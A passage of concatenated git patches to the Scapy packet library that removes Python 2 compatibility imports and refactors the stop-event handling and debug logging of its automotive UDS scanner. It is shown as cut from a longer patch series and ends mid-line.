b/scapy/layers/l2.py @@ -7,8 +7,6 @@ Classes and functions for layer 2 protocols. """ -from __future__ import absolute_import -from __future__ import print_function import struct import time import socket diff --git a/scapy/layers/lltd.py b/scapy/layers/lltd.py index 8a374f9aabb..38384db04dc 100644 --- a/scapy/layers/lltd.py +++ b/scapy/layers/lltd.py @@ -9,7 +9,6 @@ """ -from __future__ import absolute_import from array import array from scapy.fields import BitField, FlagsField, ByteField, ByteEnumField, \ diff --git a/scapy/layers/ntp.py b/scapy/layers/ntp.py index 53743f9acdd..1521bc5ded6 100644 --- a/scapy/layers/ntp.py +++ b/scapy/layers/ntp.py @@ -8,7 +8,6 @@ References : RFC 5905, RC 1305, ntpd source code """ -from __future__ import absolute_import import struct import time import datetime diff --git a/scapy/layers/sctp.py b/scapy/layers/sctp.py index fb7cd575702..acb1edd2c0e 100644 --- a/scapy/layers/sctp.py +++ b/scapy/layers/sctp.py @@ -8,7 +8,6 @@ SCTP (Stream Control Transmission Protocol). """ -from __future__ import absolute_import import struct from scapy.compat import orb, raw diff --git a/scapy/layers/snmp.py b/scapy/layers/snmp.py index b691a07bc27..b3a80da8cfe 100644 --- a/scapy/layers/snmp.py +++ b/scapy/layers/snmp.py @@ -7,7 +7,6 @@ SNMP (Simple Network Management Protocol). """ -from __future__ import print_function from scapy.packet import bind_layers, bind_bottom_up from scapy.asn1packet import ASN1_Packet from scapy.asn1fields import ASN1F_INTEGER, ASN1F_IPADDRESS, ASN1F_OID, \ diff --git a/scapy/layers/tftp.py b/scapy/layers/tftp.py index 2f4d77dad08..0254603b854 100644 --- a/scapy/layers/tftp.py +++ b/scapy/layers/tftp.py @@ -7,7 +7,6 @@ TFTP (Trivial File Transfer Protocol). """ -from __future__ import absolute_import import os import random diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index b191262aeed..cd1e93b88b8 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -36,7 +36,6 @@ timeout=2) """ -from __future__ import print_function import socket import binascii import struct diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index 4f194e0a3ee..2e8254aebfa 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -17,7 +17,6 @@ > t.run() """ -from __future__ import print_function import socket import binascii import struct diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index 7095eab29c4..66af9d6d4f9 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -27,8 +27,6 @@ No need for obnoxious openssl tweaking anymore. :) """ -from __future__ import absolute_import -from __future__ import print_function import base64 import os import time diff --git a/scapy/layers/tls/crypto/cipher_aead.py b/scapy/layers/tls/crypto/cipher_aead.py index eed8bae0edf..36a5945379e 100644 --- a/scapy/layers/tls/crypto/cipher_aead.py +++ b/scapy/layers/tls/crypto/cipher_aead.py @@ -13,7 +13,6 @@ introduced cipher suites based on a ChaCha20-Poly1305 construction. """ -from __future__ import absolute_import import struct from scapy.config import conf diff --git a/scapy/layers/tls/crypto/cipher_stream.py b/scapy/layers/tls/crypto/cipher_stream.py index dbe71c480f4..c6424b7d7a1 100644 --- a/scapy/layers/tls/crypto/cipher_stream.py +++ b/scapy/layers/tls/crypto/cipher_stream.py @@ -8,7 +8,6 @@ Stream ciphers. """ -from __future__ import absolute_import from scapy.config import conf from scapy.layers.tls.crypto.common import CipherError import scapy.libs.six as six diff --git a/scapy/layers/tls/crypto/compression.py b/scapy/layers/tls/crypto/compression.py index 91137ba2075..c80983da59e 100644 --- a/scapy/layers/tls/crypto/compression.py +++ b/scapy/layers/tls/crypto/compression.py @@ -8,7 +8,6 @@ TLS compression. """ -from __future__ import absolute_import import zlib from scapy.error import warning diff --git a/scapy/layers/tls/crypto/groups.py b/scapy/layers/tls/crypto/groups.py index 23b7672b029..fcb71b1b0ce 100644 --- a/scapy/layers/tls/crypto/groups.py +++ b/scapy/layers/tls/crypto/groups.py @@ -13,7 +13,6 @@ (Note that the equivalent of _ffdh_groups for ECDH is ec._CURVE_TYPES.) """ -from __future__ import absolute_import from scapy.config import conf from scapy.compat import bytes_int, int_bytes diff --git a/scapy/layers/tls/crypto/h_mac.py b/scapy/layers/tls/crypto/h_mac.py index 5ee48956628..ba8c6c9f13b 100644 --- a/scapy/layers/tls/crypto/h_mac.py +++ b/scapy/layers/tls/crypto/h_mac.py @@ -8,7 +8,6 @@ HMAC classes. """ -from __future__ import absolute_import import hmac from scapy.layers.tls.crypto.hash import _tls_hash_algs diff --git a/scapy/layers/tls/crypto/kx_algs.py b/scapy/layers/tls/crypto/kx_algs.py index 1f0b01e9599..3cff25fc39a 100644 --- a/scapy/layers/tls/crypto/kx_algs.py +++ b/scapy/layers/tls/crypto/kx_algs.py @@ -10,7 +10,6 @@ XXX No support yet for PSK (also, no static DH, DSS, SRP or KRB). """ -from __future__ import absolute_import from scapy.layers.tls.keyexchange import (ServerDHParams, ServerRSAParams, ClientDiffieHellmanPublic, diff --git a/scapy/layers/tls/crypto/pkcs1.py b/scapy/layers/tls/crypto/pkcs1.py index 6691a56aa89..6a4b8d7dba4 100644 --- a/scapy/layers/tls/crypto/pkcs1.py +++ b/scapy/layers/tls/crypto/pkcs1.py @@ -12,7 +12,6 @@ Ubuntu or OSX. This is why we reluctantly keep some legacy crypto here. """ -from __future__ import absolute_import from scapy.compat import bytes_encode, hex_bytes, bytes_hex import scapy.libs.six as six diff --git a/scapy/layers/tls/crypto/prf.py b/scapy/layers/tls/crypto/prf.py index 4a4c81c6928..39f35509e54 100644 --- a/scapy/layers/tls/crypto/prf.py +++ b/scapy/layers/tls/crypto/prf.py @@ -8,7 +8,6 @@ TLS Pseudorandom Function. """ -from __future__ import absolute_import from scapy.error import warning from scapy.utils import strxor diff --git a/scapy/layers/tls/crypto/suites.py b/scapy/layers/tls/crypto/suites.py index 3c06fdf2c0f..329d42b9329 100644 --- a/scapy/layers/tls/crypto/suites.py +++ b/scapy/layers/tls/crypto/suites.py @@ -11,7 +11,6 @@ https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml """ -from __future__ import absolute_import from scapy.layers.tls.crypto.kx_algs import _tls_kx_algs from scapy.layers.tls.crypto.hash import _tls_hash_algs from scapy.layers.tls.crypto.h_mac import _tls_hmac_algs diff --git a/scapy/layers/tls/extensions.py b/scapy/layers/tls/extensions.py index 112bdd5670a..c5d80d329c5 100644 --- a/scapy/layers/tls/extensions.py +++ b/scapy/layers/tls/extensions.py @@ -7,7 +7,6 @@ TLS handshake extensions. """ -from __future__ import print_function import os import struct diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 7ef4956ab16..72d7d399837 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -12,7 +12,6 @@ mechanisms which are addressed with keyexchange.py. """ -from __future__ import absolute_import import math import os import struct diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index e1e22a66993..dc6546d9919 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -9,7 +9,6 @@ TLS key exchange logic. """ -from __future__ import absolute_import import math import struct diff --git a/scapy/layers/tls/tools.py b/scapy/layers/tls/tools.py index 23c1a404e35..66318b92ec6 100644 --- a/scapy/layers/tls/tools.py +++ b/scapy/layers/tls/tools.py @@ -8,7 +8,6 @@ TLS helpers, provided as out-of-context methods. """ -from __future__ import absolute_import import struct from scapy.compat import orb, chb diff --git a/scapy/layers/tuntap.py b/scapy/layers/tuntap.py index a52dbd3ebc6..1f70e36af78 100644 --- a/scapy/layers/tuntap.py +++ b/scapy/layers/tuntap.py @@ -10,7 +10,6 @@ These allow Scapy to act as the remote side of a virtual network interface. """ -from __future__ import absolute_import import os import socket diff --git a/scapy/libs/six.py b/scapy/libs/six.py index 94703a1b202..8ba67f2798d 100644 --- a/scapy/libs/six.py +++ b/scapy/libs/six.py @@ -22,7 +22,6 @@ """Utilities for writing code that runs on Python 2 and 3""" -from __future__ import absolute_import import functools import itertools diff --git a/scapy/main.py b/scapy/main.py index dd4e2c2b243..ea6f824da98 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -7,8 +7,6 @@ Main module for interactive startup. """ -from __future__ import absolute_import -from __future__ import print_function import sys import os diff --git a/scapy/modules/nmap.py b/scapy/modules/nmap.py index c247733cc86..3fc2e337d19 100644 --- a/scapy/modules/nmap.py +++ b/scapy/modules/nmap.py @@ -16,7 +16,6 @@ """ -from __future__ import absolute_import import os import re diff --git a/scapy/modules/p0f.py b/scapy/modules/p0f.py index b026bd3696d..3adb04fe4bc 100644 --- a/scapy/modules/p0f.py +++ b/scapy/modules/p0f.py @@ -7,8 +7,6 @@ Clone of p0f v3 passive OS fingerprinting """ -from __future__ import absolute_import -from __future__ import print_function import re import struct import random diff --git a/scapy/modules/p0fv2.py b/scapy/modules/p0fv2.py index 5b7b2da848a..0a9e52cfbaf 100644 --- a/scapy/modules/p0fv2.py +++ b/scapy/modules/p0fv2.py @@ -7,8 +7,6 @@ Clone of p0f v2 passive OS fingerprinting """ -from __future__ import absolute_import -from __future__ import print_function import time import struct import os diff --git a/scapy/modules/voip.py b/scapy/modules/voip.py index edba6bde4a1..c0eb1ce006b 100644 --- a/scapy/modules/voip.py +++ b/scapy/modules/voip.py @@ -7,7 +7,6 @@ VoIP (Voice over IP) related functions """ -from __future__ import absolute_import import subprocess ################### # Listen VoIP # diff --git a/scapy/packet.py b/scapy/packet.py index 1505a21940d..47114f1b969 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -13,8 +13,6 @@ - exploration methods: explore() / ls() """ -from __future__ import absolute_import -from __future__ import print_function from collections import defaultdict import re import time diff --git a/scapy/pipetool.py b/scapy/pipetool.py index 8ee9b1bfc91..663940b20d5 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -3,7 +3,6 @@ # See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -from __future__ import print_function import os import subprocess import time diff --git a/scapy/plist.py b/scapy/plist.py index 8ca81711dd6..c7c5c4aae89 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -8,10 +8,9 @@ """ -from __future__ import absolute_import -from __future__ import print_function import os from collections import defaultdict +from typing import NamedTuple from scapy.compat import lambda_tuple_converter from scapy.config import conf @@ -36,7 +35,6 @@ Generic, Iterator, List, - NamedTuple, Optional, Tuple, Type, diff --git a/scapy/pton_ntop.py b/scapy/pton_ntop.py index 0cce2d588b8..1556b27ec4c 100644 --- a/scapy/pton_ntop.py +++ b/scapy/pton_ntop.py @@ -10,16 +10,12 @@ without IPv6 support, on Windows for instance. """ -from __future__ import absolute_import import socket import re import binascii from scapy.compat import plain_str, hex_bytes, bytes_encode, bytes_hex -from scapy.compat import ( - AddressFamily, - Union, -) +from scapy.compat import Union _IP6_ZEROS = re.compile('(?::|^)(0(?::0)+)(?::|$)') _INET6_PTON_EXC = socket.error("illegal IP address string passed to inet_pton") @@ -84,7 +80,7 @@ def _inet6_pton(addr): def inet_pton(af, addr): - # type: (AddressFamily, Union[bytes, str]) -> bytes + # type: (socket.AddressFamily, Union[bytes, str]) -> bytes """Convert an IP address from text representation into binary form.""" # Will replace Net/Net6 objects addr = plain_str(addr) @@ -132,7 +128,7 @@ def _inet6_ntop(addr): def inet_ntop(af, addr): - # type: (AddressFamily, bytes) -> str + # type: (socket.AddressFamily, bytes) -> str """Convert an IP address from binary form into text representation.""" # Use inet_ntop if available addr = bytes_encode(addr) diff --git a/scapy/route.py b/scapy/route.py index 3d0d51d006a..0bbce677185 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -8,8 +8,6 @@ """ -from __future__ import absolute_import - from scapy.compat import plain_str from scapy.config import conf from scapy.error import Scapy_Exception, warning diff --git a/scapy/route6.py b/scapy/route6.py index 00b4049e736..8fc34bd79cd 100644 --- a/scapy/route6.py +++ b/scapy/route6.py @@ -13,7 +13,6 @@ # Routing/Interfaces stuff # ############################################################################# -from __future__ import absolute_import import socket from scapy.config import conf from scapy.interfaces import resolve_iface, NetworkInterface diff --git a/scapy/scapypipes.py b/scapy/scapypipes.py index 4959837462d..7196e3af51f 100644 --- a/scapy/scapypipes.py +++ b/scapy/scapypipes.py @@ -3,7 +3,6 @@ # See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -from __future__ import print_function import socket import subprocess diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 262ebae7335..c7ad44bd20b 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -7,7 +7,6 @@ Functions to send and receive packets. """ -from __future__ import absolute_import, print_function import itertools from threading import Thread, Event import os diff --git a/scapy/supersocket.py b/scapy/supersocket.py index ff070d6e039..6be27e3eaef 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -7,7 +7,6 @@ SuperSocket. """ -from __future__ import absolute_import from select import select, error as select_error import ctypes import errno diff --git a/scapy/themes.py b/scapy/themes.py index 5153bed597c..b44a5767f0a 100644 --- a/scapy/themes.py +++ b/scapy/themes.py @@ -11,6 +11,7 @@ # Color themes # ################## +import html import sys from scapy.compat import ( @@ -388,8 +389,7 @@ def apply_ipython_style(shell): if isinstance(conf.color_theme, (FormatTheme, NoTheme)): # Formatable if isinstance(conf.color_theme, HTMLTheme): - from scapy.compat import html_escape - prompt = html_escape(conf.prompt) + prompt = html.escape(conf.prompt) elif isinstance(conf.color_theme, LatexTheme): from scapy.utils import tex_escape prompt = tex_escape(conf.prompt) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 503aa4e2d1c..ce891272be6 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -7,7 +7,6 @@ Unit testing infrastructure for Scapy """ -from __future__ import print_function import bz2 import copy diff --git a/scapy/tools/automotive/isotpscanner.py b/scapy/tools/automotive/isotpscanner.py index aacadf231c2..da58f2276dd 100755 --- a/scapy/tools/automotive/isotpscanner.py +++ b/scapy/tools/automotive/isotpscanner.py @@ -4,7 +4,6 @@ # Copyright (C) Nils Weiss # Copyright (C) Alexander Schroeder -from __future__ import print_function import getopt import sys diff --git a/scapy/tools/automotive/obdscanner.py b/scapy/tools/automotive/obdscanner.py index eb3ced417c0..c817069112e 100755 --- a/scapy/tools/automotive/obdscanner.py +++ b/scapy/tools/automotive/obdscanner.py @@ -5,7 +5,6 @@ # Copyright (C) Friedrich Feigel # Copyright (C) Nils Weiss -from __future__ import print_function import getopt import sys diff --git a/scapy/tools/check_asdis.py b/scapy/tools/check_asdis.py index ff24cd0e92f..abcf3e47477 100755 --- a/scapy/tools/check_asdis.py +++ b/scapy/tools/check_asdis.py @@ -3,7 +3,6 @@ # See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -from __future__ import print_function import getopt diff --git a/scapy/utils.py b/scapy/utils.py index fa999a2dce4..a28836da325 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -7,8 +7,6 @@ General utility functions. """ -from __future__ import absolute_import -from __future__ import print_function from decimal import Decimal diff --git a/scapy/utils6.py b/scapy/utils6.py index 26d4003f995..e6861cebadb 100644 --- a/scapy/utils6.py +++ b/scapy/utils6.py @@ -8,7 +8,6 @@ """ Utility functions for IPv6. """ -from __future__ import absolute_import import socket import struct import time diff --git a/scapy/volatile.py b/scapy/volatile.py index 8e9490a16d8..b15daccb803 100644 --- a/scapy/volatile.py +++ b/scapy/volatile.py @@ -9,7 +9,6 @@ Fields that hold random numbers. """ -from __future__ import absolute_import import copy import random import time diff --git a/setup.py b/setup.py index 758864194e3..7aef20a463f 100755 --- a/setup.py +++ b/setup.py @@ -44,7 +44,7 @@ def process_ignore_tags(buffer): 'scapy = scapy.main:interact' ] }, - python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, <4', + python_requires='>=3.7, <4', # pip > 9 handles all the versioning extras_require={ 'basic': ["ipython"], @@ -87,12 +87,7 @@ def process_ignore_tags(buffer): "Intended Audience :: System Administrators", "Intended Audience :: Telecommunications Industry", "License :: OSI Approved :: GNU General Public License v2 (GPLv2)", - "Programming Language :: Python :: 2", - "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 3", - "Programming Language :: Python :: 3.4", - "Programming Language :: Python :: 3.5", - "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", diff --git a/test/contrib/ikev2.uts b/test/contrib/ikev2.uts index 692d818e487..c6ecd01b059 100644 --- a/test/contrib/ikev2.uts +++ b/test/contrib/ikev2.uts @@ -1359,7 +1359,6 @@ frames = [ ), ] -from __future__ import print_function for i, title, data, packet in frames: print(title) diff --git a/test/fields.uts b/test/fields.uts index 2e756874aae..540877af913 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -235,7 +235,6 @@ assert p.sprintf("%s1%") == 'cafe' = Creation of a layer with ActionField ~ field actionfield -from __future__ import print_function class TestAction(Packet): __slots__ = ["_val", "_fld", "_priv1", "_priv2"] diff --git a/test/nmap.uts b/test/nmap.uts index 2a98e3d9487..abea7137c9a 100644 --- a/test/nmap.uts +++ b/test/nmap.uts @@ -20,7 +20,6 @@ assert len(d) == 5 = Fetch database ~ netaccess -from __future__ import print_function try: from urllib.request import urlopen except ImportError: diff --git a/test/p0fv2.uts b/test/p0fv2.uts index 594c4e9660e..9d77547a509 100644 --- a/test/p0fv2.uts +++ b/test/p0fv2.uts @@ -13,7 +13,6 @@ load_module('p0fv2') = Fetch database ~ netaccess -from __future__ import print_function try: from urllib.request import urlopen except ImportError: diff --git a/test/regression.uts b/test/regression.uts index 2925ac41b68..7ce792fbe3a 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -443,16 +443,6 @@ hex_data = bytes_hex(monty_data) assert hex_data == b'53746f70212057686f20617070726f61636865732074686520427269646765206f66204465617468206d75737420616e73776572206d65207468657365207175657374696f6e732074687265652c202765726520746865206f746865722073696465206865207365652e' assert hex_bytes(hex_data) == monty_data -= test gzip_decompress/gzip_compress - -from scapy.compat import gzip_compress, gzip_decompress - -gziped_data = b"\x1f\x8b\x08\x00N\xf5\xd7\\\x02\xff\x1d\x8b9\x0e\x800\x0c\x04\xbf\xb2T4\x88G ~@A\x1d\x91\x85\xa4H\x1cl#\xbe\xcf\xd1\xac4\x9a\xd9\xc5\xa5uX\x93 \xb4\xa6\x12\xb6D\x83'b\xd2\x1c\x0fBv\xcc\x0c\x9eP.s\x84j7\x15\x85_b\xc4y\xd1 Date: Wed, 4 Jan 2023 13:30:02 +0100 Subject: [PATCH 0941/1632] Refactoring of stop_event in automotive scanners --- .../automotive/scanner/configuration.py | 40 +++++++++++++++++++ scapy/contrib/automotive/scanner/executor.py | 20 ++++------ scapy/contrib/automotive/uds_scan.py | 4 +- .../automotive/scanner/configuration.uts | 4 +- .../contrib/automotive/scanner/enumerator.uts | 32 +++++++++------ 5 files changed, 72 insertions(+), 28 deletions(-) diff --git a/scapy/contrib/automotive/scanner/configuration.py b/scapy/contrib/automotive/scanner/configuration.py index 41871b79228..4c4fe944ce1 100644 --- a/scapy/contrib/automotive/scanner/configuration.py +++ b/scapy/contrib/automotive/scanner/configuration.py @@ -7,6 +7,7 @@ # scapy.contrib.status = library import inspect +from threading import Event from scapy.compat import Any, Union, List, Type, Set, cast from scapy.contrib.automotive import log_automotive @@ -110,10 +111,49 @@ def __init__(self, test_cases, **kwargs): self.stages = list() # type: List[StagedAutomotiveTestCase] self.staged_test_cases = list() # type: List[AutomotiveTestCaseABC] self.test_case_clss = set() # type: Set[Type[AutomotiveTestCaseABC]] + self.stop_event = Event() self.global_kwargs = kwargs + self.global_kwargs["stop_event"] = self.stop_event for tc in test_cases: self.add_test_case(tc) log_automotive.debug("The following configuration was created") log_automotive.debug(self.__dict__) + + def __reduce__(self): # type: ignore + f, t, d = super(AutomotiveTestCaseExecutorConfiguration, self).__reduce__() # type: ignore # noqa: E501 + + try: + del d["tps"] + except KeyError: + pass + + try: + del d["stop_event"] + except KeyError: + pass + + try: + del d["global_kwargs"]["stop_event"] + except KeyError: + pass + + for tc in d["test_cases"]: + try: + del d[tc.__class__.__name__]["stop_event"] + except KeyError: + pass + + for tc in d["staged_test_cases"]: + try: + del d[tc.__class__.__name__]["stop_event"] + except KeyError: + pass + + try: + del d["global_kwargs"]["stop_event"] + except KeyError: + pass + + return f, t, d diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index 89319f0cdcf..adb0312edc0 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -10,7 +10,6 @@ import time from itertools import product -from threading import Event from scapy.compat import Any, Union, List, Optional, \ Dict, Callable, Type, cast @@ -78,7 +77,6 @@ def __init__( self.configuration = AutomotiveTestCaseExecutorConfiguration( test_cases or self.default_test_case_clss, **kwargs) self.validate_test_case_kwargs() - self._stop_scan_event = Event() def __reduce__(self): # type: ignore f, t, d = super(AutomotiveTestCaseExecutor, self).__reduce__() # type: ignore # noqa: E501 @@ -94,10 +92,6 @@ def __reduce__(self): # type: ignore del d["reconnect_handler"] except KeyError: pass - try: - del d["_stop_scan_event"] - except KeyError: - pass return f, t, d @property @@ -200,9 +194,7 @@ def execute_test_case(self, test_case, kill_time=None): log_automotive.debug("Execute test_case %s with args %s", test_case.__class__.__name__, test_case_kwargs) - test_case.execute(self.socket, self.target_state, - stop_event=self._stop_scan_event, - **test_case_kwargs) + test_case.execute(self.socket, self.target_state, **test_case_kwargs) test_case.post_execute( self.socket, self.target_state, self.configuration) @@ -244,7 +236,7 @@ def validate_test_case_kwargs(self): def stop_scan(self): # type: () -> None - self._stop_scan_event.set() + self.configuration.stop_event.set() def progress(self): # type: () -> float @@ -266,7 +258,7 @@ def scan(self, timeout=None): :param timeout: Time for execution. :return: None """ - self._stop_scan_event.clear() + self.configuration.stop_event.clear() kill_time = time.time() + (timeout or 0xffffffff) log_automotive.debug("Set kill_time to %s" % time.ctime(kill_time)) while kill_time > time.time(): @@ -277,7 +269,7 @@ def scan(self, timeout=None): self.state_paths, self.configuration.test_cases): log_automotive.info("Scan path %s", p) terminate = kill_time <= time.time() - if terminate or self._stop_scan_event.is_set(): + if terminate or self.configuration.stop_event.is_set(): log_automotive.debug( "Execution time exceeded. Terminating scan!") break @@ -340,6 +332,10 @@ def enter_state_path(self, path): return True for next_state in path[1:]: + if self.configuration.stop_event.is_set(): + self.cleanup_state() + return False + edge = (self.target_state, next_state) if not self.enter_state(*edge): self.state_graph.downrate_edge(edge) diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index 943c66946fc..c32d939df22 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -177,7 +177,7 @@ def enter_state_with_tp(sock, # type: _SocketUnion delay = conf[UDS_DSCEnumerator.__name__]["delay_state_change"] except KeyError: delay = 5 - time.sleep(delay) + conf.stop_event.wait(delay) state_changed = UDS_DSCEnumerator.enter_state( sock, conf, kwargs["req"]) if not state_changed: @@ -549,7 +549,7 @@ def pre_execute(self, socket, state, global_configuration): # a required time delay not expired could have been received # on the previous attempt if not global_configuration.unittest: - time.sleep(11) + global_configuration.stop_event.wait(11) def _evaluate_retry(self, state, # type: EcuState diff --git a/test/contrib/automotive/scanner/configuration.uts b/test/contrib/automotive/scanner/configuration.uts index 1cf12b7223b..1db1b8706f1 100644 --- a/test/contrib/automotive/scanner/configuration.uts +++ b/test/contrib/automotive/scanner/configuration.uts @@ -93,8 +93,8 @@ try: except KeyError: pass -assert len(config["MyTestCase3"]) == 2 -assert len(config["MyTestCase2"]) == 3 +assert len(config["MyTestCase3"]) == 3 +assert len(config["MyTestCase2"]) == 4 try: print(config["MyTestCase3"]["local_config"]) diff --git a/test/contrib/automotive/scanner/enumerator.uts b/test/contrib/automotive/scanner/enumerator.uts index b0024d7a7c2..9ebec7f8f0e 100644 --- a/test/contrib/automotive/scanner/enumerator.uts +++ b/test/contrib/automotive/scanner/enumerator.uts @@ -13,7 +13,7 @@ from scapy.contrib.automotive.scanner.staged_test_case import StagedAutomotiveTe from scapy.utils import SingleConversationSocket from scapy.contrib.automotive.ecu import EcuState, EcuResponse from scapy.contrib.automotive.uds_ecu_states import * - +import copy + Basic checks = ServiceEnumerator basecls checks @@ -387,10 +387,10 @@ assert len(config.test_cases) == 3 assert len(config.stages) == 0 assert len(config.staged_test_cases) == 0 assert len(config.test_case_clss) == 3 -assert len(config.TestCase1.items()) == 4 -assert len(config.TestCase2.items()) == 3 -assert len(config["TestCase1"].items()) == 4 -assert len(config.MyTestCase.items()) == 3 +assert len(config.TestCase1.items()) == 5 +assert len(config.TestCase2.items()) == 4 +assert len(config["TestCase1"].items()) == 5 +assert len(config.MyTestCase.items()) == 4 assert config.TestCase1["verbose"] assert config.TestCase1["debug"] assert config.TestCase1["local_kwarg"] == 42 @@ -408,7 +408,7 @@ config = tce.configuration # type: AutomotiveTestCaseExecutorConfiguration assert not config.verbose assert not config.debug assert len(config.test_cases) == 1 -assert len(config.MyTestCase.items()) == 0 +assert len(config.MyTestCase.items()) == 1 assert isinstance(tce.socket, SingleConversationSocket) @@ -432,7 +432,7 @@ assert len(config.test_cases) == 1 assert len(config.stages) == 1 assert len(config.staged_test_cases) == 2 assert len(config.test_case_clss) == 3 -assert len(config.StagedAutomotiveTestCase.items()) == 0 +assert len(config.StagedAutomotiveTestCase.items()) == 1 assert isinstance(tce.socket, SingleConversationSocket) = Basic tests with two stages @@ -460,11 +460,11 @@ assert len(config.test_cases) == 2 assert len(config.stages) == 2 assert len(config.staged_test_cases) == 4 assert len(config.test_case_clss) == 5 -assert len(config.StagedAutomotiveTestCase.items()) == 1 -assert len(config.StagedTest.items()) == 1 -assert len(config.TestCase1.items()) == 1 -assert len(config.TestCase2.items()) == 1 -assert len(config.MyTestCase.items()) == 1 +assert len(config.StagedAutomotiveTestCase.items()) == 2 +assert len(config.StagedTest.items()) == 2 +assert len(config.TestCase1.items()) == 2 +assert len(config.TestCase2.items()) == 2 +assert len(config.MyTestCase.items()) == 2 assert isinstance(tce.socket, SingleConversationSocket) @@ -990,6 +990,10 @@ assert tce.scan_completed class MyTestCase1(AutomotiveTestCase): _description = "MyTestCase1" + _supported_kwargs = copy.copy(AutomotiveTestCase._supported_kwargs) + _supported_kwargs.update({ + 'stop_event': (threading._Event if six.PY2 else threading.Event, None), # type: ignore # noqa: E501 + }) @property def supported_responses(self): return [EcuResponse(EcuState(session=2), responses=UDS() / UDS_RDBIPR(dataIdentifier=2) / Raw(b"de")), @@ -999,6 +1003,10 @@ class MyTestCase1(AutomotiveTestCase): class MyTestCase2(AutomotiveTestCase): _description = "MyTestCase2" + _supported_kwargs = copy.copy(AutomotiveTestCase._supported_kwargs) + _supported_kwargs.update({ + 'stop_event': (threading._Event if six.PY2 else threading.Event, None), # type: ignore # noqa: E501 + }) @property def supported_responses(self): return [EcuResponse(EcuState(session=2), responses=UDS() / UDS_RDBIPR(dataIdentifier=5) / Raw(b"deadbeef1")), From 9a2a3819c2834aabcde87d80dd1ed1a707b95e6a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 16 Jan 2023 13:32:44 +0100 Subject: [PATCH 0942/1632] Cleanup of automotive scanner debug output (#3836) * Cleanup of automotive scanner debug output and set ISOTPSoftSocket to blocking socket * increase sniff time to stabilize test * cleanup typing * add logging * fix typing Co-authored-by: Nils Weiss --- scapy/contrib/automotive/scanner/enumerator.py | 6 +++++- scapy/contrib/automotive/scanner/executor.py | 1 + scapy/contrib/automotive/uds_scan.py | 10 ++++++---- scapy/contrib/isotp/isotp_soft_socket.py | 10 ++-------- test/contrib/isotpscan.uts | 4 ++-- 5 files changed, 16 insertions(+), 15 deletions(-) diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 25f5a28156d..196cde46d4d 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -217,10 +217,14 @@ def _get_retry_iterator(self, state): if isinstance(retry_entry, Packet): log_automotive.debug("Provide retry packet") return [retry_entry] + elif isinstance(retry_entry, list): + if len(retry_entry): + log_automotive.debug("Provide retry list") else: log_automotive.debug("Provide retry iterator") # assume self.retry_pkt is a generator or list - return retry_entry + + return retry_entry def _get_initial_request_iterator(self, state, **kwargs): # type: (EcuState, Any) -> Iterable[Packet] diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index adb0312edc0..2803d9dff50 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -237,6 +237,7 @@ def validate_test_case_kwargs(self): def stop_scan(self): # type: () -> None self.configuration.stop_event.set() + log_automotive.debug("Internal stop event set!") def progress(self): # type: () -> float diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index c32d939df22..55ee2052440 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -14,10 +14,11 @@ import inspect from collections import defaultdict -from typing import NamedTuple, Sequence + +from typing import NamedTuple from scapy.compat import Dict, Optional, List, Type, Any, Iterable, \ - cast, Union, orb, Set + cast, Union, orb, Set, Sequence from scapy.contrib.automotive import log_automotive from scapy.packet import Raw, Packet import scapy.libs.six as six @@ -224,8 +225,9 @@ def cleanup(_, configuration): try: configuration["tps"].stop() configuration["tps"] = None - except (AttributeError, KeyError) as e: - log_automotive.debug("Cleanup TP-Sender Error: %s", 